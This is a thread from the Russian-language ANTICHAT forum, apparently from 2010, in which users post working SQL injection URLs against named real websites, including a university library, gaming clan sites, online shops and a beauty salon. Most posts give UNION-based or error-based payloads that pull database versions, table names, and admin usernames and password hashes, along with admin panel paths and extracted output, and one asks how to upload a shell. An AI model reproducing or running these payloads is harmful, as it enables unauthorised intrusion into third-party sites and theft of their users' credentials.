HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #13371  
Старый 27.10.2010, 23:30
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660

Репутация: 1148
По умолчанию

pr7 тиц40

http://www.lib.udel.edu/ej/index.php?S=%' and 0 union select 1,unhex(hex(version())),3,4,5,6,7 from mysql.user/* &I=26
 
Ответить с цитированием

  #13372  
Старый 28.10.2010, 00:02
~d0s~
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279

Репутация: 55
По умолчанию

veterans-gaming.com

PR - 1

Код:
Code:
http://www.veterans-gaming.com/e107_plugins/aacgc_gamelist/AddMe.php?blabla.-1%20union%20select%201,concat_ws(0x3,version(),user(),database()),3,4,5,6,7,8,9,10,11,12--
globalassaultunit.net

PR - 1

Код:
Code:
http://globalassaultunit.net/e107_plugins/aacgc_gamelist/AddMe.php?blabla.-1%20union%20select%201,concat_ws(0x3,version(),user(),database()),3,4,5,6,7,8,9,10,11,12--
www.clankillas.net

PR - 3

Код:
Code:
http://www.clankillas.net/portal/e107_plugins/aacgc_gamelist/AddMe.php?blabla.-1%20union%20select%201,concat_ws(0x3,version(),user(),database()),3,4,5,6,7,8,9,10,11,12--
totalgamersnetwork.com

PR - 1

Код:
Code:
http://www.totalgamersnetwork.com/e107_plugins/aacgc_gamelist/AddMe.php?blabla.-1%20union%20select%201,concat_ws(0x3,version(),user(),database()),3,4,5,6,7,8,9,10,11,12--
hu.cring.eu

PR - 1

Код:
Code:
http://hu.cring.eu/e107_plugins/aacgc_gamelist/AddMe.php?blabla.-1%20union%20select%201,concat_ws(0x3,version(),user(),database()),3,4,5,6,7,8,9,10,11,12--
Примерно так выдираем хеш и никнейм админа:

Код:
Code:
http://hu.cring.eu/e107_plugins/aacgc_gamelist/AddMe.php?blabla.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3,4,5,6,7,8,9,10,11,12%20from%20e107_user--
Админка:

Код:
Code:
http://hu.cring.eu/e107_admin/admin.php
как залить шелл
 
Ответить с цитированием

  #13373  
Старый 28.10.2010, 02:08
brutos
Новичок
Регистрация: 25.11.2009
Сообщений: 0
Провел на форуме:
68379

Репутация: 0
По умолчанию

http://www.shopland-n.com/town_info.php?id=-149+union+select+1,concat_ws(0x3a3a,version(),user (),database()),3,4,5,6,7+--+

http://www.appliedartsmag.com/opinions.php?id=-37+union+select+1,concat_ws(0x3a3a,version(),@@ver sion_compile_os,user(),database()),3,4,5

http://www.creativeniche.ca/candidate_jobs_detail.cfm?jobid=-1304+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a3a ,version(),user(),database()),10,11

http://www.thunderbirdmarine.com/email-friend.php?ID=-2987+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a ,ID,username,password),11,12,13,14,15,16,17,18,19, 20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 ,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,5 3,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69, 70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86 ,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,10 2,103,104,105,106,107,108,109,110+from+Users+limit +0,1
 
Ответить с цитированием

  #13374  
Старый 28.10.2010, 06:58
Kamik
Флудер
Регистрация: 02.12.2008
Сообщений: 4,294,967,295
Провел на форуме:
689466

Репутация: 155


Отправить сообщение для Kamik с помощью ICQ
По умолчанию

Онлаин магазин.

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.historicalcenter.ru/etc.php?id=6&idg=420+union+select+1,concat_WS(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*[/COLOR][/COLOR] 
PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]histcenter[/COLOR][COLOR="#007700"]@[/COLOR][COLOR="#0000BB"]localhost[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]5.0.45[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]histcenter[/COLOR][/COLOR
Салон красоты да ляпоты =)

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.vashstile.ru/profile.php?id=12+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10/*[/COLOR][/COLOR] 
PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]admin_vashstile[/COLOR][COLOR="#007700"]@[/COLOR][COLOR="#0000BB"]localhost[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]5.0.22[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]log[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]admin_vashstile[/COLOR][/COLOR
Продолжаем копать получаем

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.vashstile.ru/profile.php?id=12+union+select+1,2,3,concat_WS(0x3a,id,username,uncrypt_pass,email,status),5,6,7,8,9,10+from+users+limit+0,1/*[/COLOR][/COLOR] 
админка тут

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.vashstile.ru/admin/[/COLOR][/COLOR] 
правда акк админа я так и не нашел
 
Ответить с цитированием

  #13375  
Старый 28.10.2010, 11:38
AC//DC
Познающий
Регистрация: 28.07.2009
Сообщений: 98
Провел на форуме:
247684

Репутация: 136
По умолчанию



http://www.elves.ru/index.php?id=301&dol=-3+and+1=2+union+select+1,2,3,4,concat_ws(0x3a,@@ve rsion,user(),database(),@@version_compile_os),6,7, 8,9,10,11,12,13,14+--

4.0.26-log Uwww64S@localhost udb64 portbld-freebsd4.10

http://www.elves.ru/index.php?id=301&dol=-3+and+1=2+union+select+1,2,3,4,concat_ws(0x3a,logi n,pass,email),6,7,8,9,10,11,12,13,14+from+client+l imit+1+offset+495--
 
Ответить с цитированием

  #13376  
Старый 28.10.2010, 18:18
tracy
Познающий
Регистрация: 24.03.2009
Сообщений: 54
Провел на форуме:
333485

Репутация: 13
По умолчанию

http://www.magelan.su/news.php?id=1075'+and+1=0+union+select+1,2,group_c oncat(table_name),4,5,6+from+information_schema.ta bles+Where+table_schema='magelan_base'+--+

ТИЦ : 230
 
Ответить с цитированием

  #13377  
Старый 28.10.2010, 18:23
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию

http://www.degreeart.com/newsite/viewpress.php?id=104 union select 1,version(),3,4,5,6-- 1

http://www.farcountrypress.com/details.php?id=214' union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,5 1,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67, 68,69,70,71,72,73,74,75,76,77-- 1

http://eurocatwalk.com/photo_details.php?uid=-428 union select 1,2,3,4,5,version(),7,8,9,10-- 1

http://www.gamedogped.com/details.php?id=48212 or 1 group by concat((select concat(username,0x3a,password) from users limit 0,1),floor(rand(0)*2))having min(0) or 1-- 1

http://www.gamepile.com/details.php?id=-21 /*!Union*/ select 1,2,table_name,4,5,6,7,8 from information_schema.`tables`-- 1
 
Ответить с цитированием

  #13378  
Старый 28.10.2010, 19:40
~d0s~
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279

Репутация: 55
По умолчанию

tidewaterintergroup.org

PR - 5

Код:
Code:
http://www.tidewaterintergroup.org/e107_plugins/aa_meetings/directory.php?Day_qf=d0s&City_qf=%2522+union+select+null,null,null,concat_ws(0x3a,user_loginname,user_password),null,null,null,null,null,null,null,null,null,null,null,null+from+e107_user+where+user_id=1--+
Код:
Code:
http://www.tidewaterintergroup.org/e107_admin/admin.php
wildcatsclan.net

PR - 1

Код:
Code:
http://www.wildcatsclan.net/e107_plugins/aacgc_event_listing/Event_Details.php?.1%20and%200%20union%20select%201,2,3,4,5,concat_ws(0x3a,user_loginname,user_password),7,8,9,10%20from%20e107_user%20where%20user_admin=1%20limit%200,1
Код:
Code:
http://www.wildcatsclan.net/e107_admin/admin.php
vancouverphoto.net

PR - 1

Код:
Code:
http://www.vancouverphoto.net/e107_plugins/aacgc_event_listing/Event_Details.php?.1%20and%200%20union%20select%201,2,3,4,5,concat_ws(0x3a,user_loginname,user_password),7,8,9,10%20from%20e107_user%20where%20user_admin=1%20limit%200,1
Код:
Code:
http://www.vancouverphoto.net/e107_admin/admin.php
 
Ответить с цитированием

  #13379  
Старый 28.10.2010, 20:24
-PRIVAT-
Участник форума
Регистрация: 17.04.2010
Сообщений: 221
Провел на форуме:
344917

Репутация: 17
По умолчанию

Цитата:
Сообщение от None  
http://www.ramzes.biz/article.php?id=-69%20union%20select%201,concat_ws(0x3a,user_name,u ser_password),3,4,5,6,7,8%20from%20cpg11d_users--
Цитата:
Сообщение от None  
http://businesstuning.biz/article.php?id=1/**/union/**/select/**/1,2,3,4
Цитата:
Сообщение от None  
http://www.ethr.biz/article.php?id=-58%20union%20select%201,concat_ws(0x3a,id,username ,password),3,4,5,6,7%20from%20member--
Цитата:
Сообщение от None  
http://www.clicknews.biz/article.php?id=115400%20or%201%20group%20by%20conc at(version(),floor(rand(0)*2))having%20min(0)%20or %201--%201
http://www.michaelandersen.biz/news/nw/article.php?id=-159%20union%20select%201,2,version(),4,5,6,7,8,9,0 ,1,2,3--
Цитата:
Сообщение от None  
http://whisperstreet.biz/news.php?id=13'%20or%201%20group%20by%20concat(ver sion(),floor(rand(0)*2))having%20min(0)%20or%201--%201
Цитата:
Сообщение от None  
http://www.marinaonthebay.biz/news.php?id=-25%20union%20select%201,2,3,concat_ws(0x3a,id,logi n,password),5,6,7,8,9,10,11%20from%20administrator s--
Цитата:
Сообщение от None  
http://turkkulturvakfi.biz/pages.php?ID=-31%20union%20select%201--
 
Ответить с цитированием

  #13380  
Старый 28.10.2010, 21:54
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

http://www.ozkulkaro.com.tr/dinamik/urun_grubu.php?urun_id=5+and+1=0+union+select+1,2, 3,4,aes_decrypt(aes_encrypt(concat_ws(0x3a,usernam e,password),1),1),6,7,8,9+from+admin--&menu=61

http://www.academictutorials.com/quiz.asp?id=66+union+select+1,2,3,4,5,6,7,8,9,10,1 1,12,13,14+from+msysaccessobjects
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ